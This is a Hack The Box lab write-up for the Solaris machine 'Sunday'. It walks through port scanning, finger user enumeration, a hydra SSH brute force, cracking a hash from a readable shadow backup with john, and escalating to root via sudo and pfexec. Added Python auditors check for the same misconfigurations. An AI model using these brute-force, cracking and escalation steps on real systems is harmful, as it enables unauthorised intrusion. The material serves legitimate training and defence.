HTB: Sunday


This machine is Sunday from Hack The Box


I started an nmap scan, but it was taking far too long, so I set up a masscan

root@kali:~# masscan -p0-65335,U:0-65335 --rate=1000 -i tun0
Discovered open port 35642/tcp on
Discovered open port 54116/tcp on
Discovered open port 22022/tcp on
Discovered open port 111/tcp on
Discovered open port 79/tcp on 

Then I nmapped the open ports only

root@kali:~# nmap -sV -p35642,54116,22022,111,79 -T4
Starting Nmap 7.70 ( ) at 2019-07-13 12:00 EDT
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 60.00% done; ETC: 12:01 (0:00:15 remaining)
Nmap scan report for
Host is up (0.031s latency).

79/tcp    open  finger    Sun Solaris fingerd
111/tcp   open  rpcbind   2-4 (RPC #100000)
22022/tcp open  ssh       SunSSH 1.3 (protocol 2.0)
35642/tcp open  smserverd 1 (RPC #100155)
54116/tcp open  unknown
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 68.00 seconds


I used finger enum from

root@kali:~# ./ -U /usr/share/wordlists/rockyou.txt -t
Starting finger-user-enum v1.0 ( )

|                   Scan Information                       |

Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/rockyou.txt
Target count ............. 1
Username count ........... 14344392
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Sat Jul 13 12:16:27 2019 #########
[email protected]: sammy                 pts/2        <Apr 24, 2018>
[email protected]: sunny                 pts/3        <Apr 24, 2018>

I had 2 potential usernames, so I saved them as users.txt and pointed hydra at SSH

root@kali:~# hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -s 22022 ssh
[22022][ssh] host:   login: sunny   password: sunday

Tried to log in with the creds

root@kali:~# ssh [email protected] -p 22022
Unable to negotiate with port 22022: no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

Weird, so I specified a valid key exchange

root@kali:~#  ssh [email protected] -p 22022 -o KeXAlgorithms=diffie-hellman-group1-sha1

There we go
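
From the defending side, the negotiation error above is an audit finding in itself: every key exchange method the server offers is a legacy one. The following is an added example, not part of the original write-up; the function names and the two weakness labels are this example's own assumptions. It parses that error line and classifies each offered method.

```python
import re

def classify_kex(name):
    """Return the reasons a key exchange method counts as legacy (empty list if none)."""
    parts = name.lower().split("-")  # token match, so "group14" is not taken for "group1"
    reasons = []
    if "group1" in parts:
        reasons.append("fixed 1024-bit DH group")
    if "sha1" in parts:
        reasons.append("SHA-1 exchange hash")
    return reasons

def parse_offer(client_error):
    """Extract the server's KEX list from an OpenSSH negotiation error line."""
    m = re.search(r"no matching key exchange method found\. Their offer: (\S+)",
                  client_error)
    return m.group(1).split(",") if m else []

def audit(client_error):
    """Return ({method: reasons}, True if the server offers nothing but legacy methods)."""
    offer = parse_offer(client_error)
    report = {alg: classify_kex(alg) for alg in offer}
    return report, bool(offer) and all(report.values())

# Error line from the session above (the target address is already absent on the page).
ERROR = ("Unable to negotiate with port 22022: no matching key exchange method found. "
         "Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,"
         "diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1")

if __name__ == "__main__":
    report, only_legacy = audit(ERROR)
    for alg, reasons in report.items():
        print(f"{alg}: {', '.join(reasons) or 'ok'}")
    print("server offers only legacy KEX:", only_legacy)
```

When the second return value is true, every client has to re-enable a retired method to connect at all, which is what the -o KeXAlgorithms override above does.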

sunny@sunday:~$ sudo -l
User sunny may run the following commands on this host:
    (root) NOPASSWD: /root/troll

I tested it

sunny@sunday:~$ sudo /root/troll
uid=0(root) gid=0(root)

It seemed to actually be a troll, so I carried on my enum, eventually finding /backup

sunny@sunday:~$ cd /backup
sunny@sunday:/backup$ ls -la
drwxr-xr-x  2 root root   4 2018-04-15 20:44 .
drwxr-xr-x 26 root root  27 2018-04-24 12:57 ..
-r-x--x--x  1 root root  53 2018-04-24 10:35 agent22.backup
-rw-r--r--  1 root root 319 2018-04-15 20:44 shadow.backup

sunny@sunday:/backup$ cat shadow.backup

I saved sammy's hash as crack.txt and set john on it

root@kali:~# john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude!        (sammy)
1g 0:00:00:27 DONE (2019-07-13 13:36) 0.03591g/s 7356p/s 7356c/s 7356C/s domonique1..bluenote
Use the "--show" option to display all of the cracked passwords reliably
Session completed
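
The root cause of this step is the -rw-r--r-- mode on shadow.backup: any local user can read the password hashes and crack them offline. The following is an added example, not part of the original write-up, of a check an administrator could run to find such files; the function names are assumptions, and the shadow entry it tests against is constructed with a placeholder salt and digest.

```python
import os
import re
import stat
import tempfile

# crypt(3) modular format ($id$salt$hash) sitting in the second colon-separated field.
CRYPT_FIELD = re.compile(r"^[^:\s]+:\$(1|2[aby]?|5|6|y)\$[^:]+:")

def find_exposed_hash_files(root):
    """Return [(path, mode, accounts)] for world-readable files that hold crypt hashes."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_IROTH:
                continue  # not a regular file, or not readable by "other"
            try:
                with open(path, "r", errors="replace") as fh:
                    accounts = [ln.split(":", 1)[0] for ln in fh if CRYPT_FIELD.match(ln)]
            except OSError:
                continue
            if accounts:
                findings.append((path, stat.filemode(st.st_mode), accounts))
    return findings

def demo():
    """Recreate the /backup situation in a temp dir using a constructed entry."""
    with tempfile.TemporaryDirectory() as d:
        # Constructed sample line: placeholder salt and digest, not a real hash.
        line = "exampleuser:$5$CONSTRUCTEDSALT$" + "A" * 43 + ":6445::::::\n"
        for name, mode in (("shadow.backup", 0o644), ("shadow.locked", 0o600)):
            path = os.path.join(d, name)
            with open(path, "w") as fh:
                fh.write("root:NP:6445::::::\n" + line)
            os.chmod(path, mode)
        return [(os.path.basename(p), m, a) for p, m, a in find_exposed_hash_files(d)]

if __name__ == "__main__":
    for name, mode, accounts in demo():
        print(f"{mode} {name}: hashes for {', '.join(accounts)}")
```

Only the 0644 copy is reported; the same content under 0600 passes, which is the mode a shadow backup should carry.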

I then su’d

sunny@sunday:/backup$ su sammy
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget

I can run wget as root, so I could use this to write as root and grant myself extra privs, but as it’s a Solaris machine, I checked the profiles too

sunny@sunday:/backup$ profiles -l

      Primary Administrator:
          *    uid=0, gid=0
      Basic Solaris User:
          /usr/bin/readcd.bin    privs=file_dac_read,sys_devices,net_privaddr
          /usr/lib/fs/smbfs/mount    privs=sys_mount
          /usr/lib/fs/smbfs/umount    privs=sys_mount

This means I can run pfexec as root

sunny@sunday:/backup$ pfexec bash

sunny@sunday:/backup# id
uid=0(root) gid=0(root) groups=10(staff)
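
Both routes to root here are plain configuration: passwordless sudo rules and a rights profile that runs every command with uid=0. The following is an added example, not part of the original write-up, that audits the `sudo -l` and `profiles -l` output shown above; the function names and the TRANSFER_TOOLS policy set are assumptions of this example.

```python
import re

USER_LINE = re.compile(r"^User (\S+) may run the following commands")
SUDO_RULE = re.compile(r"^\s*\(([^)]+)\)\s+((?:[A-Z_]+:\s*)*)(\S.*)$")
TRANSFER_TOOLS = {"wget", "curl"}  # example policy: tools that save fetched data to any path

def audit_sudo(listing):
    """Flag NOPASSWD rules in `sudo -l` output; returns (user, grant, reason) tuples."""
    findings, user = [], "?"
    for line in listing.splitlines():
        if (u := USER_LINE.match(line)):
            user = u.group(1)
        m = SUDO_RULE.match(line)
        if not m or "NOPASSWD:" not in m.group(2):
            continue
        for cmd in (c.strip() for c in m.group(3).split(",")):
            tool = cmd.split()[0].rsplit("/", 1)[-1]
            reason = ("passwordless file-transfer tool" if tool in TRANSFER_TOOLS
                      else "passwordless rule")
            findings.append((user, f"{cmd} as {m.group(1)}", reason))
    return findings

def audit_profiles(listing):
    """Flag Solaris rights-profile entries in `profiles -l` output that run with uid=0."""
    findings, profile = [], None
    for text in (ln.strip() for ln in listing.splitlines()):
        if text.endswith(":"):
            profile = text[:-1]          # profile header line
        elif text:
            cmd, _, rest = text.partition(" ")
            attrs = {a.strip() for a in rest.split(",")}
            if attrs & {"uid=0", "euid=0"}:
                scope = "every command" if cmd == "*" else cmd
                findings.append((profile, scope, "runs as root via pfexec"))
    return findings

# Output copied from the session above.
SUDO_OUT = """User sunny may run the following commands on this host:
    (root) NOPASSWD: /root/troll
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget
"""
PROFILES_OUT = """      Primary Administrator:
          *    uid=0, gid=0
      Basic Solaris User:
          /usr/bin/readcd.bin    privs=file_dac_read,sys_devices,net_privaddr
"""

if __name__ == "__main__":
    for finding in audit_sudo(SUDO_OUT) + audit_profiles(PROFILES_OUT):
        print(finding)
```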

Then find my flags

sunny@sunday:~# find / -name user.txt 2>/dev/null

sunny@sunday:~# cat /export/home/sammy/Desktop/user.txt
sunny@sunday:~# cd /root
sunny@sunday:/root# ls -la
drwx------  6 root root   13 2018-04-24 10:31 .
drwxr-xr-x 26 root root   27 2018-04-24 12:57 ..
-rw-r--r--  1 root root  280 2009-05-14 21:18 .bashrc
drwx------  3 root root    3 2018-04-15 20:22 .config
drwx------  3 root root    3 2018-04-24 09:30 .gconf
drwx------  2 root root    3 2018-04-15 20:23 .gconfd
-rwx------  1 root root  112 2018-04-24 10:48 overwrite
-rw-r--r--  1 root root  611 2009-05-14 21:18 .profile
-rw-------  1 root root 1365 2018-04-15 20:23 .recently-used.xbel
-r--------  1 root root   33 2018-04-15 20:38 root.txt
drwx------  3 root root    3 2018-04-15 20:30 .sunw
-r-x--x--x  1 root root   53 2019-07-13 17:42 troll
-rw-------  1 root root   53 2018-04-24 10:35 troll.original

sunny@sunday:/root# cat root.txt
